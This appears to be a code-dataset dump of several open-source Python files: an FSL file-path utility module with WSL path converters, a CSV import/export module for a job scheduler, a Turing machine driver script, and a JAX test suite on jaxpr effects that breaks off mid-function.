respect to the specified ``fileGroups``.
For example, if you have a directory containing::
001.hdr
001.img
002.hdr
002.img
003.hdr
003.img
And you call ``removeDuplicates`` like so::
paths = ['001.img', '001.hdr',
'002.img', '002.hdr',
'003.img', '003.hdr']
allowedExts = ['.img', '.hdr']
fileGroups = [('.img', '.hdr')]
removeDuplicates(paths, allowedExts, fileGroups)
The returned list will be::
['001.img', '002.img', '003.img']
If you provide ``allowedExts``, you may specify incomplete ``paths`` (i.e.
without extensions), as long as there are no path ambiguities.
A :exc:`PathError` will be raised if any of the ``paths`` do not exist,
or if there are any ambiguities with respect to incomplete paths.
:arg paths: List of paths to reduce.
:arg allowedExts: Allowed/recognised file extensions.
:arg fileGroups: Recognised file groups - see :func:`getFileGroup`.
"""
unique = []
for path in paths:
groupFiles = getFileGroup(path, allowedExts, fileGroups)
if not any([p in unique for p in groupFiles]):
unique.append(groupFiles[0])
return unique
def uniquePrefix(path):
"""Return the longest prefix for the given file name which unambiguously
identifies it, relative to the other files in the same directory.
Raises a :exc:`PathError` if a unique prefix could not be found (which
will never happen if the path is valid).
"""
dirname, filename = op.split(path)
idx = 0
prefix = op.join(dirname, filename[0])
hits = glob.glob('{}*'.format(prefix))
while True:
# Found a unique prefix
if len(hits) == 1:
break
# Should never happen if path is valid
elif len(hits) == 0 or idx >= len(filename) - 1:
raise PathError('No unique prefix for {}'.format(filename))
# Not unique - continue looping
else:
idx += 1
prefix = prefix + filename[idx]
hits = [h for h in hits if h.startswith(prefix)]
return prefix
def commonBase(paths):
"""Identifies the deepest common base directory shared by all files
in ``paths``.
Raises a :exc:`PathError` if the paths have no common base. This will
never happen for absolute paths (as the base will be e.g. ``'/'``).
"""
depths = [len(p.split(op.sep)) for p in paths]
base = max(zip(depths, paths), key=operator.itemgetter(0))[1]
last = base
while True:
base = op.split(base)[0]
if base == last or len(base) == 0:
break
last = base
if all([p.startswith(base) for p in paths]):
return base
raise PathError('No common base')
def wslpath(winpath):
"""
Convert Windows path (or a command line argument containing a Windows path)
to the equivalent WSL path (e.g. ``c:\\Users`` -> ``/mnt/c/Users``). Also supports
paths in the form ``\\wsl$\\(distro)\\users\\...``
:param winpath: Command line argument which may (or may not) contain a Windows path. It is assumed to be
either of the form <windows path> or --<arg>=<windows path>. Note that we don't need to
handle --arg <windows path> or -a <windows path> since in these cases the argument
and the path will be parsed as separate entities.
:return: If ``winpath`` matches a Windows path, the converted argument (including the --<arg>= portion).
Otherwise returns ``winpath`` unchanged.
"""
match = re.match(r"^(--[\w-]+=)?\\\\wsl\$[\\\/][^\\^\/]+(.*)$", winpath)
if match:
arg, path = match.group(1, 2)
if arg is None:
arg = ""
return arg + path.replace("\\", "/")
match = re.match(r"^(--[\w-]+=)?([a-zA-z]):(.+)$", winpath)
if match:
arg, drive, path = match.group(1, 2, 3)
if arg is None:
arg = ""
return arg + "/mnt/" + drive.lower() + path.replace("\\", "/")
return winpath
def winpath(wslpath):
"""
Convert a WSL-local filepath (for example ``/usr/local/fsl/``) into a path that can be used from
Windows.
If ``self.fslwsl`` is ``False``, simply returns ``wslpath`` unmodified
Otherwise, uses ``FSLDIR`` to deduce the WSL distro in use for FSL.
This requires WSL2 which supports the ``\\wsl$\`` network path.
wslpath is assumed to be an absolute path.
"""
if not platform.fslwsl:
return wslpath
else:
match = re.match(r"^\\\\wsl\$\\([^\\]+).*$", platform.fsldir)
if match:
distro = match.group(1)
else:
distro = None
if not distro:
raise RuntimeError("Could not identify WSL installation from FSLDIR (%s)" % platform.fsldir)
return "\\\\wsl$\\" + distro + wslpath.replace("/", "\\")
| 31.166951 | 108 | 0.607598 | #!/usr/bin/env python
#
# path.py - Utility functions for working with file/directory paths.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module contains a few utility functions for working with file system
paths.
.. autosummary::
:nosignatures:
deepest
shallowest
allFiles
hasExt
addExt
removeExt
getExt
splitExt
getFileGroup
removeDuplicates
uniquePrefix
commonBase
wslpath
winpath
"""
import os.path as op
import os
import glob
import operator
import re
from fsl.utils.platform import platform
class PathError(Exception):
"""``Exception`` class raised by the functions defined in this module
when something goes wrong.
"""
pass
def deepest(path, suffixes):
"""Finds the deepest directory which ends with one of the given
sequence of suffixes, or returns ``None`` if no directories end
with any of the suffixes.
"""
path = path.strip()
if path == op.sep or path == '':
return None
path = path.rstrip(op.sep)
if any([path.endswith(s) for s in suffixes]):
return path
return deepest(op.dirname(path), suffixes)
def shallowest(path, suffixes):
"""Finds the shallowest directory which ends with one of the given
sequence of suffixes, or returns ``None`` if no directories end
with any of the suffixes.
"""
path = path.strip()
# We've reached the root of the file system
if path == op.sep or path == '' or op.splitdrive(path)[1] == '':
return None
path = path.rstrip(op.sep)
parent = shallowest(op.dirname(path), suffixes)
if parent is not None:
return parent
if any([path.endswith(s) for s in suffixes]):
return path
return None
def allFiles(root):
"""Return a list containing all files which exist underneath the specified
``root`` directory.
"""
files = []
for dirpath, _, filenames in os.walk(root):
filenames = [op.join(dirpath, f) for f in filenames]
files.extend(filenames)
return files
def hasExt(path, allowedExts):
"""Convenience function which returns ``True`` if the given ``path``
ends with any of the given ``allowedExts``, ``False`` otherwise.
"""
return any([path.endswith(e) for e in allowedExts])
def addExt(prefix,
allowedExts=None,
mustExist=True,
defaultExt=None,
fileGroups=None,
unambiguous=True):
"""Adds a file extension to the given file ``prefix``.
If ``mustExist`` is False, and the file does not already have a
supported extension, the default extension is appended and the new
file name returned. If the prefix already has a supported extension,
it is returned unchanged.
If ``mustExist`` is ``True`` (the default), the function checks to see
if any files exist that have the given prefix, and a supported file
extension. A :exc:`PathError` is raised if:
- No files exist with the given prefix and a supported extension.
- ``fileGroups is None`` and ``unambiguous is True``, and more than
one file exists with the given prefix, and a supported extension.
Otherwise the full file name is returned.
:arg prefix: The file name prefix to modify.
:arg allowedExts: List of allowed file extensions.
:arg mustExist: Whether the file must exist or not.
:arg defaultExt: Default file extension to use.
:arg fileGroups: Recognised file groups - see :func:`getFileGroup`.
:arg unambiguous: If ``True`` (the default), and more than one file
exists with the specified ``prefix``, a
:exc:`PathError` is raised. Otherwise, a list
containing *all* matching files is returned.
"""
if allowedExts is None: allowedExts = []
if fileGroups is None: fileGroups = {}
if defaultExt is not None and defaultExt not in allowedExts:
allowedExts.append(defaultExt)
if not mustExist:
# the provided file name already
# ends with a supported extension
if hasExt(prefix, allowedExts):
return prefix
if defaultExt is not None: return prefix + defaultExt
else: return prefix
# If no allowed extensions were
# provided, or the provided prefix
# already ends with a supported
# extension, check to see that it
# exists.
if len(allowedExts) == 0 or hasExt(prefix, allowedExts):
allPaths = [prefix]
# Otherwise, make a bunch of file names, one per
# supported extension, and test to see if exactly
# one of them exists.
else:
allPaths = [prefix + ext for ext in allowedExts]
allPaths = [p for p in allPaths if op.isfile(p)]
nexists = len(allPaths)
# Could not find any supported file
# with the specified prefix
if nexists == 0:
raise PathError('Could not find a supported file '
'with prefix "{}"'.format(prefix))
# If ambiguity is ok, return
# all matching paths
elif not unambiguous:
return allPaths
# Ambiguity is not ok! More than
# one supported file with the
# specified prefix.
elif nexists > 1:
# Remove non-existent paths from the
# extended list, get all their
# suffixes, and see if they match
# any file groups.
suffixes = [getExt(p, allowedExts) for p in allPaths]
groupMatches = [sorted(suffixes) == sorted(g) for g in fileGroups]
# Is there a match for a file suffix group?
# If not, multiple files with the specified
# prefix exist, and there is no way to
# resolve the ambiguity.
if sum(groupMatches) != 1:
raise PathError('More than one file with '
'prefix "{}"'.format(prefix))
# Otherwise, we return a path
# to the file which matches the
# first suffix in the group.
groupIdx = groupMatches.index(True)
allPaths = [prefix + fileGroups[groupIdx][0]]
# Return the full file name of the
# supported file that was found
return allPaths[0]
def removeExt(filename, allowedExts=None, firstDot=False):
"""Returns the base name of the given file name. See :func:`splitExt`. """
return splitExt(filename, allowedExts, firstDot)[0]
def getExt(filename, allowedExts=None, firstDot=False):
"""Returns the extension of the given file name. See :func:`splitExt`. """
return splitExt(filename, allowedExts, firstDot)[1]
def splitExt(filename, allowedExts=None, firstDot=False):
"""Returns the base name and the extension from the given file name.
If ``allowedExts`` is ``None`` and ``firstDot`` is ``False``, this
function is equivalent to using::
os.path.splitext(filename)
If ``allowedExts`` is ``None`` and ``firstDot`` is ``True``, the file
name is split on the first period that is found, rather than the last
period. For example::
splitExt('image.nii.gz') # -> ('image.nii', '.gz')
splitExt('image.nii.gz', firstDot=True) # -> ('image', '.nii.gz')
If ``allowedExts`` is provided, ``firstDot`` is ignored. In this case, if
the file does not end with an allowed extension, a tuple containing
``(filename, '')`` is returned.
:arg filename: The file name to split.
:arg allowedExts: Allowed/recognised file extensions.
:arg firstDot: Split the file name on the first period, rather than the
last period. Ignored if ``allowedExts`` is specified.
"""
# If allowedExts is not specified
# we split on a period character
if allowedExts is None:
# split on last period - equivalent
# to op.splitext
if not firstDot:
return op.splitext(filename)
# split on first period
else:
idx = filename.find('.')
if idx == -1:
return filename, ''
else:
return filename[:idx], filename[idx:]
# Otherwise, try and find a suffix match
extMatches = [filename.endswith(ext) for ext in allowedExts]
# No match, assume there is no extension
if not any(extMatches):
return filename, ''
# Otherwise split the filename
# into its base and its extension
extIdx = extMatches.index(True)
extLen = len(allowedExts[extIdx])
return filename[:-extLen], filename[-extLen:]
def getFileGroup(path,
allowedExts=None,
fileGroups=None,
fullPaths=True,
unambiguous=False):
"""If the given ``path`` is part of a ``fileGroup``, returns a list
containing the paths to all other files in the group (including the
``path`` itself).
If the ``path`` does not appear to be part of a file group, or appears to
be part of an incomplete file group, a list containing only the ``path``
is returned.
If the ``path`` does not exist, or appears to be part of more than one
file group, a :exc:`PathError` is raised.
File groups can be used to specify a collection of file suffixes which
should always exist alongside each other. This can be used to resolve
ambiguity when multiple files exist with the same ``prefix`` and supported
extensions (e.g. ``file.hdr`` and ``file.img``). The file groups are
specified as a list of sequences, for example::
[('.img', '.hdr'),
('.img.gz', '.hdr.gz')]
If you specify ``fileGroups=[('.img', '.hdr')]`` and ``prefix='file'``, and
both ``file.img`` and ``file.hdr`` exist, the :func:`addExt` function would
return ``file.img`` (i.e. the file which matches the first extension in
the group).
Similarly, if you call the :func:`.imcp.imcp` or :func:`.imcp.immv`
functions with the above parameters, both ``file.img`` and ``file.hdr``
will be moved.
.. note:: The primary use-case of file groups is to resolve ambiguity with
respect to NIFTI and ANALYSE75 image pairs. By specifying
``fileGroups=[('.img', '.hdr'), ('.img.gz', '.hdr.gz')]``, the
:func:`addExt`, :func:`.imcp.immv` and :func:`.imcp.imcp`
functions are able to figure out what you mean when you specify
``file``, and both ``file.hdr`` and ``file.img`` (or
``file.hdr.gz`` and ``file.img.gz``) exist.
:arg path: Path to the file. Must contain the file extension.
:arg allowedExts: Allowed/recognised file extensions.
:arg fileGroups: Recognised file groups.
:arg fullPaths: If ``True`` (the default), full file paths (relative to
the ``path``) are returned. Otherwise, only the file
extensions in the group are returned.
:arg unambiguous: Defaults to ``False``. If ``True``, and the path
is not unambiguously part of one group, or part of
no groups, a :exc:`PathError` is raised.
Otherwise, the path is returned.
"""
path = addExt(path, allowedExts, mustExist=True, fileGroups=fileGroups)
base, ext = splitExt(path, allowedExts)
if fileGroups is None:
if fullPaths: return [path]
else: return [ext]
matchedGroups = []
matchedGroupFiles = []
fullMatches = 0
partialMatches = 0
for group in fileGroups:
if ext != '' and ext not in group:
continue
groupFiles = [base + s for s in group]
exist = [op.exists(f) for f in groupFiles]
if any(exist):
partialMatches += 1
if all(exist):
fullMatches += 1
matchedGroups .append(group)
matchedGroupFiles.append(groupFiles)
# Path is not part of any group
if partialMatches == 0:
if fullPaths: return [path]
else: return [ext]
# If the given path is part of more
# than one existing file group, we
# can't resolve this ambiguity.
if fullMatches > 1:
raise PathError('Path is part of multiple '
'file groups: {}'.format(path))
# If the unambiguous flag is not set,
# we don't care about partial matches
if not unambiguous:
partialMatches = 0
# The path is unambiguously part of a
# complete file group - resolve it to
# the first element of the group
if fullMatches == 1 and partialMatches <= 1:
if fullPaths: return matchedGroupFiles[0]
else: return matchedGroups[ 0]
# The path appears to be part of
# an incomplete group - this is
# potentially ambiguous, so give
# up (but see the partialMatches
# clobber above).
elif partialMatches > 0:
raise PathError('Path is part of an incomplete '
'file group: {}'.format(path))
else:
if fullPaths: return [path]
else: return [ext]
def removeDuplicates(paths, allowedExts=None, fileGroups=None):
"""Reduces the list of ``paths`` down to those which are unique with
respect to the specified ``fileGroups``.
For example, if you have a directory containing::
001.hdr
001.img
002.hdr
002.img
003.hdr
003.img
And you call ``removeDuplicates`` like so::
paths = ['001.img', '001.hdr',
'002.img', '002.hdr',
'003.img', '003.hdr']
allowedExts = ['.img', '.hdr']
fileGroups = [('.img', '.hdr')]
removeDuplicates(paths, allowedExts, fileGroups)
The returned list will be::
['001.img', '002.img', '003.img']
If you provide ``allowedExts``, you may specify incomplete ``paths`` (i.e.
without extensions), as long as there are no path ambiguities.
A :exc:`PathError` will be raised if any of the ``paths`` do not exist,
or if there are any ambiguities with respect to incomplete paths.
:arg paths: List of paths to reduce.
:arg allowedExts: Allowed/recognised file extensions.
:arg fileGroups: Recognised file groups - see :func:`getFileGroup`.
"""
unique = []
for path in paths:
groupFiles = getFileGroup(path, allowedExts, fileGroups)
if not any([p in unique for p in groupFiles]):
unique.append(groupFiles[0])
return unique
def uniquePrefix(path):
"""Return the longest prefix for the given file name which unambiguously
identifies it, relative to the other files in the same directory.
Raises a :exc:`PathError` if a unique prefix could not be found (which
will never happen if the path is valid).
"""
dirname, filename = op.split(path)
idx = 0
prefix = op.join(dirname, filename[0])
hits = glob.glob('{}*'.format(prefix))
while True:
# Found a unique prefix
if len(hits) == 1:
break
# Should never happen if path is valid
elif len(hits) == 0 or idx >= len(filename) - 1:
raise PathError('No unique prefix for {}'.format(filename))
# Not unique - continue looping
else:
idx += 1
prefix = prefix + filename[idx]
hits = [h for h in hits if h.startswith(prefix)]
return prefix
def commonBase(paths):
"""Identifies the deepest common base directory shared by all files
in ``paths``.
Raises a :exc:`PathError` if the paths have no common base. This will
never happen for absolute paths (as the base will be e.g. ``'/'``).
"""
depths = [len(p.split(op.sep)) for p in paths]
base = max(zip(depths, paths), key=operator.itemgetter(0))[1]
last = base
while True:
base = op.split(base)[0]
if base == last or len(base) == 0:
break
last = base
if all([p.startswith(base) for p in paths]):
return base
raise PathError('No common base')
def wslpath(winpath):
"""
Convert Windows path (or a command line argument containing a Windows path)
to the equivalent WSL path (e.g. ``c:\\Users`` -> ``/mnt/c/Users``). Also supports
paths in the form ``\\wsl$\\(distro)\\users\\...``
:param winpath: Command line argument which may (or may not) contain a Windows path. It is assumed to be
either of the form <windows path> or --<arg>=<windows path>. Note that we don't need to
handle --arg <windows path> or -a <windows path> since in these cases the argument
and the path will be parsed as separate entities.
:return: If ``winpath`` matches a Windows path, the converted argument (including the --<arg>= portion).
Otherwise returns ``winpath`` unchanged.
"""
match = re.match(r"^(--[\w-]+=)?\\\\wsl\$[\\\/][^\\^\/]+(.*)$", winpath)
if match:
arg, path = match.group(1, 2)
if arg is None:
arg = ""
return arg + path.replace("\\", "/")
match = re.match(r"^(--[\w-]+=)?([a-zA-z]):(.+)$", winpath)
if match:
arg, drive, path = match.group(1, 2, 3)
if arg is None:
arg = ""
return arg + "/mnt/" + drive.lower() + path.replace("\\", "/")
return winpath
def winpath(wslpath):
"""
Convert a WSL-local filepath (for example ``/usr/local/fsl/``) into a path that can be used from
Windows.
If ``self.fslwsl`` is ``False``, simply returns ``wslpath`` unmodified
Otherwise, uses ``FSLDIR`` to deduce the WSL distro in use for FSL.
This requires WSL2 which supports the ``\\wsl$\`` network path.
wslpath is assumed to be an absolute path.
"""
if not platform.fslwsl:
return wslpath
else:
match = re.match(r"^\\\\wsl\$\\([^\\]+).*$", platform.fsldir)
if match:
distro = match.group(1)
else:
distro = None
if not distro:
raise RuntimeError("Could not identify WSL installation from FSLDIR (%s)" % platform.fsldir)
return "\\\\wsl$\\" + distro + wslpath.replace("/", "\\")
| 0 | 0 | 0 |
45a3d4d8a1f127580265a0a3c5979a90f99be58c | 2,219 | py | Python | implementation/data_io.py | rpalo/masters-thesis | fcc0beb933634b17dbe41bde982e947204fd498b | [
"MIT"
] | null | null | null | implementation/data_io.py | rpalo/masters-thesis | fcc0beb933634b17dbe41bde982e947204fd498b | [
"MIT"
] | null | null | null | implementation/data_io.py | rpalo/masters-thesis | fcc0beb933634b17dbe41bde982e947204fd498b | [
"MIT"
] | null | null | null | """Data I/O: Import and export data to other useable formats."""
import csv
from pathlib import Path
from model import Job
def import_csv(filename, base_dir=Path("data/")):
"""Converts CSV files with the relevant data (see columns below) to
a list of Jobs.
"""
datafile = base_dir / filename
with open(datafile, "r", newline="", encoding="utf-8-sig") as csvfile:
reader = csv.DictReader(csvfile)
return [
Job(
line["part number"],
int(line["quantity"]),
float(line["cycle"]),
int(line["cavities"]),
float(line["due date"]),
line["mold"],
line["material"],
[int(num) for num in line["machines"].split(",")],
float(line["setup"]),
float(line["teardown"])
) for i, line in enumerate(reader, start=2)
]
def export_csv(schedule, fitness, time_elapsed, filename, base_dir=Path("results/")):
"""Exports a generated schedule to CSV in a format where each machine
has its jobs listed with start and end dates in order of operation.
Each machine separated by a blank line.
"""
outfile = base_dir / filename
with open(outfile, "w") as csvfile:
fieldnames = ["part number", "due date", "material", "start", "end"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for machine in schedule:
writer.writerow({"part number": f"Machine {machine.number}"})
for assignment in machine.queue:
writer.writerow({
"part number": assignment.job.number,
"due date": assignment.job.due_date,
"material": assignment.job.material,
"start": assignment.start,
"end": assignment.end,
})
writer.writerow({})
writer.writerow({})
writer.writerow({
"part number": "Total fitness:",
"due date": fitness
})
writer.writerow({
"part number": "Time elapsed:",
"due date": time_elapsed
}) | 36.377049 | 85 | 0.545291 | """Data I/O: Import and export data to other useable formats."""
import csv
from pathlib import Path
from model import Job
def import_csv(filename, base_dir=Path("data/")):
"""Converts CSV files with the relevant data (see columns below) to
a list of Jobs.
"""
datafile = base_dir / filename
with open(datafile, "r", newline="", encoding="utf-8-sig") as csvfile:
reader = csv.DictReader(csvfile)
return [
Job(
line["part number"],
int(line["quantity"]),
float(line["cycle"]),
int(line["cavities"]),
float(line["due date"]),
line["mold"],
line["material"],
[int(num) for num in line["machines"].split(",")],
float(line["setup"]),
float(line["teardown"])
) for i, line in enumerate(reader, start=2)
]
def export_csv(schedule, fitness, time_elapsed, filename, base_dir=Path("results/")):
"""Exports a generated schedule to CSV in a format where each machine
has its jobs listed with start and end dates in order of operation.
Each machine separated by a blank line.
"""
outfile = base_dir / filename
with open(outfile, "w") as csvfile:
fieldnames = ["part number", "due date", "material", "start", "end"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for machine in schedule:
writer.writerow({"part number": f"Machine {machine.number}"})
for assignment in machine.queue:
writer.writerow({
"part number": assignment.job.number,
"due date": assignment.job.due_date,
"material": assignment.job.material,
"start": assignment.start,
"end": assignment.end,
})
writer.writerow({})
writer.writerow({})
writer.writerow({
"part number": "Total fitness:",
"due date": fitness
})
writer.writerow({
"part number": "Time elapsed:",
"due date": time_elapsed
}) | 0 | 0 | 0 |
4b6df05e93d40512d05614cf34c5a45fa482901a | 3,203 | py | Python | main.py | dilynfullerton/turing | f175b14b1fb1afe9f2bfeebd1cc069eef6658706 | [
"CC0-1.0"
] | 3 | 2016-07-20T08:46:55.000Z | 2018-05-14T11:27:41.000Z | main.py | dilynfullerton/turing | f175b14b1fb1afe9f2bfeebd1cc069eef6658706 | [
"CC0-1.0"
] | null | null | null | main.py | dilynfullerton/turing | f175b14b1fb1afe9f2bfeebd1cc069eef6658706 | [
"CC0-1.0"
] | null | null | null | from turing import turing_machine_from_file
from turing import tape_from_file
from turing import Tape
main()
| 31.401961 | 80 | 0.652825 | from turing import turing_machine_from_file
from turing import tape_from_file
from turing import Tape
def main():
# busy_beaver3 = turing_machine_from_file('examples/bb3.txt')
# busy_beaver3.compute(
# input_tape='examples/bb3_input.txt',
# print_results=False)
#
# busy_beaver4 = turing_machine_from_file('examples/bb4.txt')
# busy_beaver4.compute(
# input_tape='examples/bb4_input.txt',
# print_results=False)
#
# copy_machine = turing_machine_from_file('examples/copy.txt')
# copy_machine.compute(
# input_tape='examples/copy_input.txt',
# print_results=False)
# copy_machine.compute(
# input_tape='examples/copy_input2.txt',
# print_results=False)
#
# subtractor = turing_machine_from_file('examples/subtract.txt')
# subtractor.compute(
# input_tape='examples/subtract_3_2.txt',
# print_results=False)
# subtractor.compute(
# input_tape='examples/subtract9_5.txt',
# print_results=False)
#
# counter = turing_machine_from_file('examples/counter.txt')
# counter.compute(
# input_tape='examples/count_to_16.txt',
# print_results=False)
#
# adder = turing_machine_from_file('examples/add.txt')
# adder.compute(
# input_tape='examples/add2_2.txt',
# print_results=False)
#
# wolfram23 = turing_machine_from_file('examples/wolfram2_3.txt')
# wolfram23.compute(
# input_tape='examples/wolfram2_3_input.txt',
# print_results=False, max_iter=150)
#
# infinite_printer = turing_machine_from_file('examples/infinite_print.txt')
# infinite_printer.compute(
# input_tape='examples/infinite_print_input.txt',
# print_results=False, max_iter=100)
#
# copy_machine9000 = turing_machine_from_file('examples/binary_copy.txt')
# copy_machine9000.compute(
# input_tape='examples/binary_copy_input.txt',
# print_results=False)
#
# negator = turing_machine_from_file('examples/negator.txt')
# negator.compute(
# input_tape='examples/negator_input0.txt',
# print_results=False
# )
# negator.compute(
# input_tape='examples/negator_input1.txt',
# print_results=False,
# max_iter=20
# )
#
# nand = turing_machine_from_file('examples/nand.txt')
# nand.compute(
# input_tape='examples/nand_input.txt',
# print_results=False
# )
# collatz = turing_machine_from_file('examples/collatz.txt')
# ans = collatz.compute(
# input_tape=Tape(['1']*3),
# print_results=True
# )
# factorial = turing_machine_from_file('examples/factorial.txt')
# factorial.compute(
# input_tape=Tape(['1']*4),
# print_results=True
# )
# is_prime = turing_machine_from_file('examples/is_prime.txt')
# is_prime.compute(
# input_tape=Tape(['1']*11),
# print_results=True
# )
quicksort = turing_machine_from_file('examples/quicksort.txt')
quicksort.compute(
input_tape='examples/quicksort_input.txt',
print_results=True,
max_iter=15000,
)
main()
| 3,068 | 0 | 23 |
3494f87ceb9d94ec03be1cb6fd48f0923ce4c7df | 7,460 | py | Python | tests/jaxpr_effects_test.py | mbmccoy/jax | 74346f464bc8369d81964305fcf05f95f43fb2d3 | [
"Apache-2.0"
] | null | null | null | tests/jaxpr_effects_test.py | mbmccoy/jax | 74346f464bc8369d81964305fcf05f95f43fb2d3 | [
"Apache-2.0"
] | 3 | 2022-01-24T06:14:55.000Z | 2022-02-14T06:15:38.000Z | tests/jaxpr_effects_test.py | mbmccoy/jax | 74346f464bc8369d81964305fcf05f95f43fb2d3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
from jax import ad_checkpoint
from jax import core
from jax import lax
from jax import linear_util as lu
from jax.experimental import maps
from jax.experimental import pjit
from jax.config import config
from jax._src import test_util as jtu
import numpy as np
config.parse_flags_with_absl()
effect_p = core.Primitive('effect')
effect_p.multiple_results = True
@effect_p.def_effectful_abstract_eval
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
| 29.959839 | 78 | 0.684316 | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
from jax import ad_checkpoint
from jax import core
from jax import lax
from jax import linear_util as lu
from jax.experimental import maps
from jax.experimental import pjit
from jax.config import config
from jax._src import test_util as jtu
import numpy as np
config.parse_flags_with_absl()
effect_p = core.Primitive('effect')
effect_p.multiple_results = True
@effect_p.def_effectful_abstract_eval
def _(*, effect):
return [], {effect}
class JaxprEffectsTest(jtu.JaxTestCase):
def test_trivial_jaxpr_has_no_effects(self):
def f(x):
return x + 1.
jaxpr = jax.make_jaxpr(f)(2.)
self.assertEqual(core.no_effects, jaxpr.effects)
def test_effectful_primitive_in_jaxpr_creates_effects(self):
def f(x):
effect_p.bind(effect='foo')
return x + 1.
jaxpr = jax.make_jaxpr(f)(2.)
self.assertEqual({'foo'}, jaxpr.jaxpr.eqns[0].effects)
self.assertEqual({'foo'}, jaxpr.effects)
def test_different_effects_in_jaxpr(self):
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x + 1.
jaxpr = jax.make_jaxpr(f)(2.)
self.assertEqual({'foo'}, jaxpr.jaxpr.eqns[0].effects)
self.assertEqual({'bar'}, jaxpr.jaxpr.eqns[1].effects)
self.assertEqual({'foo', 'bar'}, jaxpr.effects)
def test_jaxpr_typecheck_should_verify_eqn_effects_are_subset(self):
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x + 1.
jaxpr = jax.make_jaxpr(f)(2.).jaxpr
# Edit jaxpr to make its type wrong
jaxpr = jaxpr.replace(effects={'foo'})
with self.assertRaisesRegex(core.JaxprTypeError,
'Equation effects are not subset of Jaxpr effects.'):
core.check_jaxpr(jaxpr)
class HigherOrderPrimitiveTest(jtu.JaxTestCase):
def test_core_call_primitive_inherits_effects(self):
def f(x):
@lu.wrap_init
def f_(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return [x]
return core.call(f_, x)[0]
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(2.)
def test_xla_call_primitive_inherits_effects(self):
@jax.jit
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(2.)
@parameterized.named_parameters(jtu.cases_from_list(
dict(testcase_name=f"_{flavor}", flavor=flavor)
for flavor in ["old", "new"]))
def test_remat_call_primitive_inherits_effects(self, flavor):
remat = jax.remat if flavor == "old" else ad_checkpoint.checkpoint
@remat
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(2.)
def test_custom_jvp_primitive_inherits_effects(self):
@jax.custom_jvp
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
f.defjvp(lambda x, t: (x, t))
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(2.)
def test_custom_vjp_primitive_inherits_effects(self):
@jax.custom_vjp
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
f.defvjp(
fwd=lambda x: (x, ()),
bwd=lambda _, g: g)
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(2.)
def test_pmap_inherits_effects(self):
@jax.pmap
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(jnp.arange(jax.local_device_count()))
def test_xmap_inherits_effects(self):
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
f = maps.xmap(f, in_axes=['a'], out_axes=['a'])
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f)(jnp.arange(jax.local_device_count()))
def test_pjit_inherits_effects(self):
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
def f(x):
effect_p.bind(effect='foo')
effect_p.bind(effect='bar')
return x
f = pjit.pjit(f, in_axis_resources=pjit.PartitionSpec('x'),
out_axis_resources=pjit.PartitionSpec('x'))
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
with maps.Mesh(np.array(jax.devices()), ['x']):
jax.make_jaxpr(f)(jnp.arange(jax.local_device_count()))
class EffectfulJaxprLoweringTest(jtu.JaxTestCase):
def test_cannot_lower_jaxpr_with_effects_in_hop(self):
@jax.jit
def f(x):
effect_p.bind(effect='foo')
return x + 1.
with self.assertRaisesRegex(NotImplementedError, 'Lowering jaxprs with '
'effects not supported'):
f(2.)
class ControlFlowEffectsTest(jtu.JaxTestCase):
def test_effects_disallowed_in_cond(self):
def f1(x):
def true_fun(x):
effect_p.bind(effect='foo')
return x
def false_fun(x):
return x
return lax.cond(True, true_fun, false_fun, x)
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f1)(2.)
def f2(x):
def true_fun(x):
return x
def false_fun(x):
effect_p.bind(effect='foo')
return x
return lax.cond(True, true_fun, false_fun, x)
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f2)(2.)
def test_effects_disallowed_in_while(self):
def f1(x):
def cond_fun(x):
effect_p.bind(effect='foo')
return False
def body_fun(x):
return x
return lax.while_loop(cond_fun, body_fun, x)
with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
jax.make_jaxpr(f1)(2.)
def f2(x):
def cond_fun(x):
return False
